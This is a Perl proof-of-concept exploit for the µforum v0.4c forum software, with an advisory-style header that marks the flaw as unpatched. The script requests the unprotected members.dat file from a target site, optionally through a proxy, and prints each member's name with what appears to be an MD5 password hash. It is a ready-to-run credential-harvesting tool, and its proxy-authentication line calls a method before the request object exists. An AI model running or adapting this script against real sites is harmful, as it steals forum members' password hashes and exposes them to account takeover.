#!/usr/bin/perl
#
# Affected.scr..: µforum v0.4c
# Poc.ID........: 08060901
# Type..........: Member's passwords are stored in .dat file no protected by a .htaccess file
# Risk.level....: Medium
# Vendor.Status.: Unpatched
# Src.download..: comscripts.com/scripts/php.forum.1568.html
# Poc.link......: acid-root.new.fr/poc/08060901.txt
# Credits.......: DarkFig
#
use LWP::UserAgent;
use HTTP::Request::Common;
use Getopt::Long;
use strict;

print STDOUT "\n+", '-' x 53, "+\n";
print STDOUT "|          µforum v0.4c (members.dat) Exploit         |\n";
print STDOUT '+', '-' x 53, "+\n";

my($host,$path,$proxh,$proxu,$proxp,$req);
my $opt = GetOptions(
   'host=s'   =>  \$host,
   'path=s'   =>  \$path,
   'proxh=s'  =>  \$proxh,
   'proxu=s'  =>  \$proxu,
   'proxp=s'  =>  \$proxp);

if(!$host) {
    print STDOUT "| Usage: ./xx.pl --host=[www] --path=[/] [Options]    |\n";
    print STDOUT "| [Options] --proxh=[ip] --proxu=[user] --proxp=[pwd] |\n";
    print STDOUT '+', '-' x 53, "+\n";
    exit(1);
}


if(!$path) {$path = '/';}
$host .= $path.'membres/members.dat';
if($host  !~ /http/) {$host = 'http://'.$host;}

my $ua = LWP::UserAgent->new();
   $ua->agent('Mozilla');
   $ua->timeout(30);
   $ua->proxy(['http'] => $proxh) if $proxh;
   $req->proxy_authorization_basic($proxu, $proxp) if $proxp;

   $req = GET $host;
   $req = $ua->request($req);
   my $dat = $req->content;
   my @tabl= split(/:/, $dat);

foreach (@tabl) {
      if($_ =~ /"(.*)";a/){
            print STDOUT "\n".$1.'::';}

      if($_ =~ /"([a-z0-9]{32})";i/){
            print STDOUT $1;}
}

print "\n";
exit(0);